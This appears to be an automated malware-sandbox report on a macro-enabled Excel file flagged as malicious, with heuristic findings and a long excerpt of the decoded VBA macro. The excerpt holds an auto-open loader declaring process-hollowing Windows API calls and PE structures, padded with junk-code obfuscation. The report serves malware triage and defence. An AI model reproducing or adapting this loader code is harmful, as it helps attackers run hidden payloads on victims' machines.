MALICIOUS
138
Risk Score
Heuristics 6
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
With CreateObject("Microsoft.XMLDOM").createElement("b64") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
With CreateObject("Microsoft.XMLDOM").createElement("b64") -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "AutoOpen" -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub Auto_Open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 102255 bytes |
SHA-256: f0f4ddc53c4bb8b8ccd2e82788c0f232fb3d38612280f9e033a29defa6b57619 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
884 of 1247 identifiers look randomly generated (e.g. 'MiwiESwiMS4cCQEEAjEWLhInJQ8JFywGNywfMS8D'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation. Carved artifact contains 30 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "AutoOpen"
Option Explicit
#If Win64 Then
Private Declare PtrSafe Sub RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByVal sSource As LongPtr, ByVal lLength As Long)
Private Declare PtrSafe Function GetModuleFileName Lib "KERNEL32" Alias "GetModuleFileNameA" (ByVal hModule As LongPtr, ByVal lpFilename As String, ByVal nSize As Long) As Long
Private Declare PtrSafe Function CreateProcess Lib "KERNEL32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As LongPtr, ByVal lpThreadAttributes As LongPtr, ByVal bInheritHandles As Boolean, ByVal dwCreationFlags As Long, ByVal lpEnvironment As LongPtr, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare PtrSafe Function GetThreadContext Lib "KERNEL32" (ByVal hThread As LongPtr, ByVal lpContext As LongPtr) As Long
Private Declare PtrSafe Function ReadProcessMemory Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesRead As LongPtr) As Long
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function VirtualAllocEx Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function VirtualFree Lib "KERNEL32" (ByVal lpAddress As LongPtr, dwSize As Long, dwFreeType As Long) As Long
Private Declare PtrSafe Function WriteProcessMemory Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As LongPtr) As Long
Private Declare PtrSafe Function SetThreadContext Lib "KERNEL32" (ByVal hThread As LongPtr, ByVal lpContext As LongPtr) As Long
Private Declare PtrSafe Function ResumeThread Lib "KERNEL32" (ByVal hThread As LongPtr) As Long
Private Declare PtrSafe Function TerminateProcess Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal uExitCode As Integer) As Long
#Else
Private Declare Sub RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As Long, ByVal sSource As Long, ByVal lLength As Long)
Private Declare Function GetModuleFileName Lib "KERNEL32" Alias "GetModuleFileNameA" (ByVal hModule As Long, ByVal lpFilename As String, ByVal nSize As Long) As Long
Private Declare Function CreateProcess Lib "KERNEL32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Boolean, ByVal dwCreationFlags As Long, ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare Function GetThreadContext Lib "KERNEL32" (ByVal hThread As Long, lpContext As CONTEXT) As Long
Private Declare Function ReadProcessMemory Lib "KERNEL32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesRead As LongPtr) As Long
Private Declare Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare Function VirtualAllocEx Lib "KERNEL32" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare Function VirtualFree Lib "KERNEL32" (ByVal lpAddress As LongPtr, dwSize As Long, dwFreeType As Long) As Long
Private Declare Function WriteProcessMemory Lib "KERNEL32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As Long, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As LongPtr) As Long
Private Declare Function SetThreadContext Lib "KERNEL32" (ByVal hThread As Long, lpContext As CONTEXT) As Long
Private Declare Function ResumeThread Lib "KERNEL32" (ByVal hThread As Long) As Long
Private Declare Function TerminateProcess Lib "KERNEL32" (ByVal hProcess As Long, ByVal uExitCode As Integer) As Long
#End If
Private Const IMAGE_NUMBEROF_DIRECTORY_ENTRIES = 16
Private Const IMAGE_SIZEOF_SHORT_NAME = 8
Private Const MAXIMUM_SUPPORTED_EXTENSION = 512
Private Const SIZE_OF_80387_REGISTERS = 80
#If Win64 Then
Private Type M128A
Low As LongLong
High As LongLong
End Type
#End If
Private Type IMAGE_DOS_HEADER
e_magic As Integer 'WORD e_magic;
e_cblp As Integer 'WORD e_cblp;
e_cp As Integer 'WORD e_cp;
e_crlc As Integer 'WORD e_crlc;
e_cparhdr As Integer 'WORD e_cparhdr;
e_minalloc As Integer 'WORD e_minalloc;
e_maxalloc As Integer 'WORD e_maxalloc;
e_ss As Integer 'WORD e_ss;
e_sp As Integer 'WORD e_sp;
e_csum As Integer 'WORD e_csum;
e_ip As Integer 'WORD e_ip;
e_cs As Integer 'WORD e_cs;
e_lfarlc As Integer 'WORD e_lfarlc;
e_ovno As Integer 'WORD e_ovno;
e_res(4 - 1) As Integer 'WORD e_res[4];
e_oemid As Integer 'WORD e_oemid;
e_oeminfo As Integer 'WORD e_oeminfo;
e_res2(10 - 1) As Integer 'WORD e_res2[10];
e_lfanew As Long 'LONG e_lfanew;
End Type
Private Type IMAGE_DATA_DIRECTORY
VirtualAddress As Long 'DWORD VirtualAddress;
Size As Long 'DWORD Size;
End Type
Private Type IMAGE_BASE_RELOCATION
VirtualAddress As Long 'DWORD VirtualAddress
SizeOfBlock As Long 'DWORD SizeOfBlock
End Type
Private Type IMAGE_FILE_HEADER
Machine As Integer 'WORD Machine;
NumberOfSections As Integer 'WORD NumberOfSections;
TimeDateStamp As Long 'DWORD TimeDateStamp;
PointerToSymbolTable As Long 'DWORD PointerToSymbolTable;
NumberOfSymbols As Long 'DWORD NumberOfSymbols;
SizeOfOptionalHeader As Integer 'WORD SizeOfOptionalHeader;
Characteristics As Integer 'WORD Characteristics;
End Type
Private Type IMAGE_OPTIONAL_HEADER
#If Win64 Then
Magic As Integer 'WORD Magic;
MajorLinkerVersion As Byte 'BYTE MajorLinkerVersion;
MinorLinkerVersion As Byte 'BYTE MinorLinkerVersion;
SizeOfCode As Long 'DWORD SizeOfCode;
SizeOfInitializedData As Long 'DWORD SizeOfInitializedData;
SizeOfUninitializedData As Long 'DWORD SizeOfUninitializedData;
AddressOfEntryPoint As Long 'DWORD AddressOfEntryPoint;
BaseOfCode As Long 'DWORD BaseOfCode;
ImageBase As LongLong 'ULONGLONG ImageBase;
SectionAlignment As Long 'DWORD SectionAlignment;
FileAlignment As Long 'DWORD FileAlignment;
MajorOperatingSystemVersion As Integer 'WORD MajorOperatingSystemVersion;
MinorOperatingSystemVersion As Integer 'WORD MinorOperatingSystemVersion;
MajorImageVersion As Integer 'WORD MajorImageVersion;
MinorImageVersion As Integer 'WORD MinorImageVersion;
MajorSubsystemVersion As Integer 'WORD MajorSubsystemVersion;
MinorSubsystemVersion As Integer 'WORD MinorSubsystemVersion;
Win32VersionValue As Long 'DWORD Win32VersionValue;
SizeOfImage As Long 'DWORD SizeOfImage;
SizeOfHeaders As Long 'DWORD SizeOfHeaders;
CheckSum As Long 'DWORD CheckSum;
Subsystem As Integer 'WORD Subsystem;
DllCharacteristics As Integer 'WORD DllCharacteristics;
SizeOfStackReserve As LongLong 'ULONGLONG SizeOfStackReserve;
SizeOfStackCommit As LongLong 'ULONGLONG SizeOfStackCommit;
SizeOfHeapReserve As LongLong 'ULONGLONG SizeOfHeapReserve;
SizeOfHeapCommit As LongLong 'ULONGLONG SizeOfHeapCommit;
LoaderFlags As Long 'DWORD LoaderFlags;
NumberOfRvaAndSizes As Long 'DWORD NumberOfRvaAndSizes;
DataDirectory(IMAGE_NUMBEROF_DIRECTORY_ENTRIES - 1) As IMAGE_DATA_DIRECTORY 'IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
#Else
Magic As Integer 'WORD Magic;
MajorLinkerVersion As Byte 'BYTE MajorLinkerVersion;
MinorLinkerVersion As Byte 'BYTE MinorLinkerVersion;
SizeOfCode As Long 'DWORD SizeOfCode;
SizeOfInitializedData As Long 'DWORD SizeOfInitializedData;
SizeOfUninitializedData As Long 'DWORD SizeOfUninitializedData;
AddressOfEntryPoint As Long 'DWORD AddressOfEntryPoint;
BaseOfCode As Long 'DWORD BaseOfCode;
BaseOfData As Long 'DWORD BaseOfData;
ImageBase As Long 'DWORD ImageBase;
SectionAlignment As Long 'DWORD SectionAlignment;
FileAlignment As Long 'DWORD FileAlignment;
MajorOperatingSystemVersion As Integer 'WORD MajorOperatingSystemVersion;
MinorOperatingSystemVersion As Integer 'WORD MinorOperatingSystemVersion;
MajorImageVersion As Integer 'WORD MajorImageVersion;
MinorImageVersion As Integer 'WORD MinorImageVersion;
MajorSubsystemVersion As Integer 'WORD MajorSubsystemVersion;
MinorSubsystemVersion As Integer 'WORD MinorSubsystemVersion;
Win32VersionValue As Long 'DWORD Win32VersionValue;
SizeOfImage As Long 'DWORD SizeOfImage;
SizeOfHeaders As Long 'DWORD SizeOfHeaders;
CheckSum As Long 'DWORD CheckSum;
Subsystem As Integer 'WORD Subsystem;
DllCharacteristics As Integer 'WORD DllCharacteristics;
SizeOfStackReserve As Long 'DWORD SizeOfStackReserve;
SizeOfStackCommit As Long 'DWORD SizeOfStackCommit;
SizeOfHeapReserve As Long 'DWORD SizeOfHeapReserve;
SizeOfHeapCommit As Long 'DWORD SizeOfHeapCommit;
LoaderFlags As Long 'DWORD LoaderFlags;
NumberOfRvaAndSizes As Long 'DWORD NumberOfRvaAndSizes;
DataDirectory(IMAGE_NUMBEROF_DIRECTORY_ENTRIES - 1) As IMAGE_DATA_DIRECTORY 'IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
#End If
End Type
Private Type IMAGE_NT_HEADERS
Signature As Long 'DWORD Signature;
FileHeader As IMAGE_FILE_HEADER 'IMAGE_FILE_HEADER FileHeader;
OptionalHeader As IMAGE_OPTIONAL_HEADER 'IMAGE_OPTIONAL_HEADER OptionalHeader;
End Type
Private Type IMAGE_SECTION_HEADER
SecName(IMAGE_SIZEOF_SHORT_NAME - 1) As Byte 'UCHAR Name[IMAGE_SIZEOF_SHORT_NAME];
Misc As Long 'ULONG Misc;
VirtualAddress As Long 'ULONG VirtualAddress;
SizeOfRawData As Long 'ULONG SizeOfRawData;
PointerToRawData As Long 'ULONG PointerToRawData;
PointerToRelocations As Long 'ULONG PointerToRelocations;
PointerToLinenumbers As Long 'ULONG PointerToLinenumbers;
NumberOfRelocations As Integer 'WORD NumberOfRelocations;
NumberOfLinenumbers As Integer 'WORD NumberOfLinenumbers;
Characteristics As Long 'ULONG Characteristics;
End Type
Private Type PROCESS_INFORMATION
hProcess As LongPtr 'HANDLE hProcess;
hThread As LongPtr 'HANDLE hThread;
dwProcessId As Long 'DWORD dwProcessId;
dwThreadId As Long 'DWORD dwThreadId;
End Type
Private Type STARTUPINFO
cb As Long 'DWORD cb;
lpReserved As String 'LPSTR lpReserved;
lpDesktop As String 'LPSTR lpDesktop;
lpTitle As String 'LPSTR lpTitle;
dwX As Long 'DWORD dwX;
dwY As Long 'DWORD dwY;
dwXSize As Long 'DWORD dwXSize;
dwYSize As Long 'DWORD dwYSize;
dwXCountChars As Long 'DWORD dwXCountChars;
dwYCountChars As Long 'DWORD dwYCountChars;
dwFillAttribute As Long 'DWORD dwFillAttribute;
dwFlags As Long 'DWORD dwFlags;
wShowWindow As Integer 'WORD wShowWindow;
cbReserved2 As Integer 'WORD cbReserved2;
lpReserved2 As LongPtr 'LPBYTE lpReserved2;
hStdInput As LongPtr 'HANDLE hStdInput;
hStdOutput As LongPtr 'HANDLE hStdOutput;
hStdError As LongPtr 'HANDLE hStdError;
End Type
Private Type FLOATING_SAVE_AREA
ControlWord As Long 'DWORD ControlWord;
StatusWord As Long 'DWORD StatusWord;
TagWord As Long 'DWORD TagWord;
ErrorOffset As Long 'DWORD ErrorOffset;
ErrorSelector As Long 'DWORD ErrorSelector;
DataOffset As Long 'DWORD DataOffset;
DataSelector As Long 'DWORD DataSelector;
RegisterArea(SIZE_OF_80387_REGISTERS - 1) As Byte 'BYTE RegisterArea[SIZE_OF_80387_REGISTERS];
Spare0 As Long 'DWORD Spare0;
End Type
' winnt.h
#If Win64 Then
Private Type XMM_SAVE_AREA32
ControlWord As Integer 'WORD ControlWord;
StatusWord As Integer 'WORD StatusWord;
TagWord As Byte 'BYTE TagWord;
Reserved1 As Byte 'BYTE Reserved1;
ErrorOpcode As Integer 'WORD ErrorOpcode;
ErrorOffset As Long 'DWORD ErrorOffset;
ErrorSelector As Integer 'WORD ErrorSelector;
Reserved2 As Integer 'WORD Reserved2;
DataOffset As Long 'DWORD DataOffset;
DataSelector As Integer 'WORD DataSelector;
Reserved3 As Integer 'WORD Reserved3;
MxCsr As Long 'DWORD MxCsr;
MxCsr_Mask As Long 'DWORD MxCsr_Mask;
FloatRegisters(8 - 1) As M128A 'M128A FloatRegisters[8];
XmmRegisters(16 - 1) As M128A 'M128A XmmRegisters[16];
Reserved4(96 - 1) As Byte 'BYTE Reserved4[96];
End Type
#End If
Private Type CONTEXT
#If Win64 Then
' Register parameter home addresses
P1Home As LongLong 'DWORD64 P1Home;
P2Home As LongLong 'DWORD64 P2Home;
P3Home As LongLong 'DWORD64 P3Home;
P4Home As LongLong 'DWORD64 P4Home;
P5Home As LongLong 'DWORD64 P5Home;
P6Home As LongLong 'DWORD64 P6Home;
' Control flags
ContextFlags As Long 'DWORD ContextFlags;
MxCsr As Long 'DWORD MxCsr;
' Segment Registers and processor flags
SegCs As Integer 'WORD SegCs;
SegDs As Integer 'WORD SegDs;
SegEs As Integer 'WORD SegEs;
SegFs As Integer 'WORD SegFs;
SegGs As Integer 'WORD SegGs;
SegSs As Integer 'WORD SegSs;
EFlags As Long 'DWORD EFlags;
' Debug registers
Dr0 As LongLong 'DWORD64 Dr0;
Dr1 As LongLong 'DWORD64 Dr1;
Dr2 As LongLong 'DWORD64 Dr2;
Dr3 As LongLong 'DWORD64 Dr3;
Dr6 As LongLong 'DWORD64 Dr6;
Dr7 As LongLong 'DWORD64 Dr7;
' Integer registers
Rax As LongLong 'DWORD64 Rax;
Rcx As LongLong 'DWORD64 Rcx;
Rdx As LongLong 'DWORD64 Rdx;
Rbx As LongLong 'DWORD64 Rbx;
Rsp As LongLong 'DWORD64 Rsp;
Rbp As LongLong 'DWORD64 Rbp;
Rsi As LongLong 'DWORD64 Rsi;
Rdi As LongLong 'DWORD64 Rdi;
R8 As LongLong 'DWORD64 R8;
R9 As LongLong 'DWORD64 R9;
R10 As LongLong 'DWORD64 R10;
R11 As LongLong 'DWORD64 R11;
R12 As LongLong 'DWORD64 R12;
R13 As LongLong 'DWORD64 R13;
R14 As LongLong 'DWORD64 R14;
R15 As LongLong 'DWORD64 R15;
' Program counter
Rip As LongLong 'DWORD64 Rip
' Floating point state
FltSave As XMM_SAVE_AREA32 'XMM_SAVE_AREA32 FltSave;
VectorRegister(26 - 1) As M128A 'M128A VectorRegister[26];
VectorControl As LongLong 'DWORD64 VectorControl;
DebugControl As LongLong 'DWORD64 DebugControl;
LastBranchToRip As LongLong 'DWORD64 LastBranchToRip;
LastBranchFromRip As LongLong 'DWORD64 LastBranchFromRip;
LastExceptionToRip As LongLong 'DWORD64 LastExceptionToRip;
LastExceptionFromRip As LongLong 'DWORD64 LastExceptionFromRip;
#Else
ContextFlags As Long 'DWORD ContextFlags;
Dr0 As Long 'DWORD Dr0;
Dr1 As Long 'DWORD Dr1;
Dr2 As Long 'DWORD Dr2;
Dr3 As Long 'DWORD Dr3;
Dr6 As Long 'DWORD Dr6;
Dr7 As Long 'DWORD Dr7;
FloatSave As FLOATING_SAVE_AREA 'FLOATING_SAVE_AREA FloatSave;
SegGs As Long 'DWORD SegGs;
SegFs As Long 'DWORD SegFs;
SegEs As Long 'DWORD SegEs;
SegDs As Long 'DWORD SegDs;
Edi As Long 'DWORD Edi;
Esi As Long 'DWORD Esi;
Ebx As Long 'DWORD Ebx;
Edx As Long 'DWORD Edx;
Ecx As Long 'DWORD Ecx;
Eax As Long 'DWORD Eax;
Ebp As Long 'DWORD Ebp;
Eip As Long 'DWORD Eip;
SegCs As Long 'DWORD SegCs; // MUST BE SANITIZED
EFlags As Long 'DWORD EFlags; // MUST BE SANITIZED
Esp As Long 'DWORD Esp;
SegSs As Long 'DWORD SegSs;
ExtendedRegisters(MAXIMUM_SUPPORTED_EXTENSION - 1) As Byte
#End If
End Type
Private Const MEM_COMMIT = &H1000
Private Const MEM_RESERVE = &H2000
Private Const PAGE_READWRITE = &H4
Private Const PAGE_EXECUTE_READWRITE = &H40
Private Const MAX_PATH = 260
Private Const CREATE_SUSPENDED = &H4
Private Const CONTEXT_AMD64 = &H100000
Private Const CONTEXT_I386 = &H10000
#If Win64 Then
Private Const CONTEXT_ARCH = CONTEXT_AMD64
#Else
Private Const CONTEXT_ARCH = CONTEXT_I386
#End If
Private Const CONTEXT_CONTROL = CONTEXT_ARCH Or &H1
Private Const CONTEXT_INTEGER = CONTEXT_ARCH Or &H2
Private Const CONTEXT_SEGMENTS = CONTEXT_ARCH Or &H4
Private Const CONTEXT_FLOATING_POINT = CONTEXT_ARCH Or &H8
Private Const CONTEXT_DEBUG_REGISTERS = CONTEXT_ARCH Or &H10
Private Const CONTEXT_EXTENDED_REGISTERS = CONTEXT_ARCH Or &H20
Private Const CONTEXT_FULL = CONTEXT_CONTROL Or CONTEXT_INTEGER Or CONTEXT_SEGMENTS
Private Const VERBOSE = False
Private Const IMAGE_DOS_SIGNATURE = &H5A4D
Private Const IMAGE_NT_SIGNATURE = &H4550
Private Const IMAGE_FILE_MACHINE_I386 = &H14C
Private Const IMAGE_FILE_MACHINE_AMD64 = &H8664
Private Const SIZEOF_IMAGE_DOS_HEADER = 64
Private Const SIZEOF_IMAGE_SECTION_HEADER = 40
Private Const SIZEOF_IMAGE_FILE_HEADER = 20
Private Const SIZEOF_IMAGE_DATA_DIRECTORY = 8
Private Const SIZEOF_IMAGE_BASE_RELOCATION = 8
Private Const SIZEOF_IMAGE_BASE_RELOCATION_ENTRY = 2
#If Win64 Then
Private Const SIZEOF_IMAGE_NT_HEADERS = 264
Private Const SIZEOF_ADDRESS = 8
#Else
Private Const SIZEOF_IMAGE_NT_HEADERS = 248
Private Const SIZEOF_ADDRESS = 4
#End If
Private Const IMAGE_DIRECTORY_ENTRY_EXPORT = 0
Private Const IMAGE_DIRECTORY_ENTRY_IMPORT = 1
Private Const IMAGE_DIRECTORY_ENTRY_RESOURCE = 2
Private Const IMAGE_DIRECTORY_ENTRY_EXCEPTION = 3
Private Const IMAGE_DIRECTORY_ENTRY_SECURITY = 4
Private Const IMAGE_DIRECTORY_ENTRY_BASERELOC = 5
Private Const IMAGE_DIRECTORY_ENTRY_DEBUG = 6
Private Const IMAGE_DIRECTORY_ENTRY_COPYRIGHT = 7
Private Const IMAGE_DIRECTORY_ENTRY_GLOBALPTR = 8
Private Const IMAGE_DIRECTORY_ENTRY_TLS = 9
Private Const IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG = 10
Function jdBQdPGLQIQADmjUhpGTK()
End Function
If 1 <> 1 Then
Function LdYRdhPTgjgkAQofjLMOC(1 as Integer)
End Function
End If
Public Function ByteArrayLength(baBytes() As Byte) As Long
On Error Resume Next
Dim UGiRBglKHVXFisEUIuRsQ, bwkmUKvcirdKqjlczXeQL
UGiRBglKHVXFisEUIuRsQ = "dxwgbTcwopywrqlgwJnmd"
bwkmUKvcirdKqjlczXeQL = InStr(UGiRBglKHVXFisEUIuRsQ, "i")
If bwkmUKvcirdKqjlczXeQL <> 0 Then
Dim FfnylhfxQAqXMSjWFFuPH, yETURitRjvNBeurWMIDpE
FfnylhfxQAqXMSjWFFuPH = 3388
yETURitRjvNBeurWMIDpE = (FfnylhfxQAqXMSjWFFuPH Mod 7)
Else
Dim rPMLCpbfTrIadhAtDtXLF, GfCwHxRaRWPAdhNhipSsM, peeAanPDjpECXJKjoUQif
peeAanPDjpECXJKjoUQif = True
GfCwHxRaRWPAdhNhipSsM = True
rPMLCpbfTrIadhAtDtXLF = peeAanPDjpECXJKjoUQif
End If
ByteArrayLength = UBound(baBytes) - LBound(baBytes) + 1
End Function
Private Function ByteArrayToString(baBytes() As Byte) As String
Dim strRes As String: strRes = ""
Dim iCount As Integer
Dim xrVNUxpbYCIhmiwHwBkCa
xrVNUxpbYCIhmiwHwBkCa = "aYLlveftSrbyVGkbvIGkW"
If Len(xrVNUxpbYCIhmiwHwBkCa) < Len("i") Then
Dim HToNfPaOfAJRswCHJinec, mXMQFfUOYdzGEOxGaPHom
HToNfPaOfAJRswCHJinec = 2025
mXMQFfUOYdzGEOxGaPHom = 4293
If HToNfPaOfAJRswCHJinec = mXMQFfUOYdzGEOxGaPHom Then
Dim TcYoTLSaMtWxXvVAVyJfY, gwjlNGfaIsEOOrUNBLtcO
TcYoTLSaMtWxXvVAVyJfY = "ewdWTtbjGnIlaanerNlzj"
gwjlNGfaIsEOOrUNBLtcO = 2491
Else
Dim lJCiFtAfdqXjnNEOdffMa
lJCiFtAfdqXjnNEOdffMa = True
End If
Else
Dim earIidaMuLpdkTMGdhmDT, FcGEBDpXyGnoOhIkyxpAs
earIidaMuLpdkTMGdhmDT = "fsJKrnGhIsMGBUCIoBJdk"
FcGEBDpXyGnoOhIkyxpAs = InStr(earIidaMuLpdkTMGdhmDT, "e")
If FcGEBDpXyGnoOhIkyxpAs <= 0 Then
Dim IDHgcSRiYWRjfxXKdFzJO
IDHgcSRiYWRjfxXKdFzJO = Date
Else
Dim UfbOvMdvDJWcBWxXyyJxP
UfbOvMdvDJWcBWxXyyJxP = "ldrmUGVWeTvKNYesmBguc"
End If
End If
For iCount = 0 To ByteArrayLength(baBytes) - 1
If baBytes(iCount) <> 0 Then
Dim nQcLeyQHttvNbIWeSWmem, GSmFolwEbVrHrGAVtFifA
nQcLeyQHttvNbIWeSWmem = "fIIJzuQOQCMyFqGfOLumU"
GSmFolwEbVrHrGAVtFifA = InStr(nQcLeyQHttvNbIWeSWmem, "m")
If GSmFolwEbVrHrGAVtFifA = 0 Then
Dim OWLtEJWQyCJyYGWPgPnuc, rxdgIcvizqeYLQUzlIAzN
OWLtEJWQyCJyYGWPgPnuc = "gDAALDgPmYwuFILesViRh"
rxdgIcvizqeYLQUzlIAzN = True
Else
Dim CsGiraCgnPTJxwzHmUHAH, YmEznOcpTgLUoOfwXqcRc, lzkontvQXMRXfDfcHekAP
CsGiraCgnPTJxwzHmUHAH = "lXkYrhREHddwzYehjMQJY"
YmEznOcpTgLUoOfwXqcRc = "EDpdYGTavPluMTFqAtwol"
lzkontvQXMRXfDfcHekAP = InStr(Mid(CsGiraCgnPTJxwzHmUHAH, 3, 2), Mid(CsGiraCgnPTJxwzHmUHAH, 5, 2))
If lzkontvQXMRXfDfcHekAP < 0 Then
Dim sIhOiHtloEFHFMLulYuFx, VtTWilYuqlQqmSQczfLcE
sIhOiHtloEFHFMLulYuFx = 3466
VtTWilYuqlQqmSQczfLcE = sIhOiHtloEFHFMLulYuFx - 2068
Else
Dim JimpzPtGvfOUrvpnRawtQ
JimpzPtGvfOUrvpnRawtQ = CurDir
End If
End If
strRes = strRes & Chr(baBytes(iCount))
Else
Exit For
End If
Next iCount
Dim yjeFkrbNeelMUyvtDeNtV, eAukHBxhyjTUeunwiwMmS
yjeFkrbNeelMUyvtDeNtV = 1777
For eAukHBxhyjTUeunwiwMmS = 1 To yjeFkrbNeelMUyvtDeNtV
Dim IGDJdHAeJEwLvuIIvBODG, ETrRPeiVvHahcuTQzETVc, NEwiIaDNLTWHmeLlRmCsi
IGDJdHAeJEwLvuIIvBODG = 3936
ETrRPeiVvHahcuTQzETVc = "qsSUsLSIDRmlHGHuFMTgb"
NEwiIaDNLTWHmeLlRmCsi = IGDJdHAeJEwLvuIIvBODG
Next eAukHBxhyjTUeunwiwMmS
ByteArrayToString = strRes
End Function
Private Function FileToByteArray(strFilename As String) As Byte()
Dim strFileContent As String
Dim iFile As Integer: iFile = FreeFile
Dim aHmwqieyNaEjsgCHGlnDE
aHmwqieyNaEjsgCHGlnDE = 4719
Do Until aHmwqieyNaEjsgCHGlnDE = 0
Dim eJrHTfRdOjSPaxidJoynR, OSTyGxMshLCsxVWUOvdmu
eJrHTfRdOjSPaxidJoynR = "vEsYOQUWUHDQpUIheDhIN"
OSTyGxMshLCsxVWUOvdmu = Replace(eJrHTfRdOjSPaxidJoynR, "b", "d")
aHmwqieyNaEjsgCHGlnDE = aHmwqieyNaEjsgCHGlnDE - 1
Loop
Open strFilename For Binary Access Read As #iFile
strFileContent = Space(FileLen(strFilename))
Get #iFile, , strFileContent
Close #iFile
Dim KGfwFivhJqsvUOgjvbcso, oxOqdYRLWwHBuQTeKpKYS
KGfwFivhJqsvUOgjvbcso = 4115
For oxOqdYRLWwHBuQTeKpKYS = 1 To KGfwFivhJqsvUOgjvbcso
Dim MzIKkyIirjLuMvjqgBiDu, LSJTzWleJKrsvBXfERziD, EnUgGuJNEMBvxaFYQKAwd
MzIKkyIirjLuMvjqgBiDu = 3692
LSJTzWleJKrsvBXfERziD = "ssHuDVVNqLoQxjnHeKHxp"
EnUgGuJNEMBvxaFYQKAwd = MzIKkyIirjLuMvjqgBiDu
Next oxOqdYRLWwHBuQTeKpKYS
Dim baFileContent() As Byte
Dim zFHieMAhdmISENArHHUwl, LrLDaViYoYdVKUImQPses, lpzyKVHDMHbwOMnVEdPsh
zFHieMAhdmISENArHHUwl = "rTlkBIIuQgFNMRBApfWOW"
LrLDaViYoYdVKUImQPses = "WArgNhXKzWOAepAyDddSb"
lpzyKVHDMHbwOMnVEdPsh = InStr(Mid(zFHieMAhdmISENArHHUwl, 4, 8), Mid(zFHieMAhdmISENArHHUwl, 4, 7))
If lpzyKVHDMHbwOMnVEdPsh < 0 Then
Dim OmFWTRQePQBsSAcmepazv, ArbyUiuqmMBLlwcSBPdQy
OmFWTRQePQBsSAcmepazv = 2307
ArbyUiuqmMBLlwcSBPdQy = (OmFWTRQePQBsSAcmepazv Mod 4)
Else
Dim VPyeVmlIzNPRLnUExXJvN, DeYFGeYsCyVIVEABuXVjH
VPyeVmlIzNPRLnUExXJvN = "GSYkdRXUMBzEeutSdMBJI"
DeYFGeYsCyVIVEABuXVjH = InStr(VPyeVmlIzNPRLnUExXJvN, "a")
If DeYFGeYsCyVIVEABuXVjH <= 0 Then
Dim MXLSyihodRtuKsLzxohmq, VoTiOItccaNmfQfnMhUQd
MXLSyihodRtuKsLzxohmq = 2000
VoTiOItccaNmfQfnMhUQd = MXLSyihodRtuKsLzxohmq Mod 184
Else
Dim yGCoklNcWINVrPIQKJzNm, bQEhFBGlKgmumwHrTEwEY
yGCoklNcWINVrPIQKJzNm = True
bQEhFBGlKgmumwHrTEwEY = "qjPnHCbcLcTVVpGrVJpaO"
End If
End If
baFileContent = StrConv(strFileContent, vbFromUnicode)
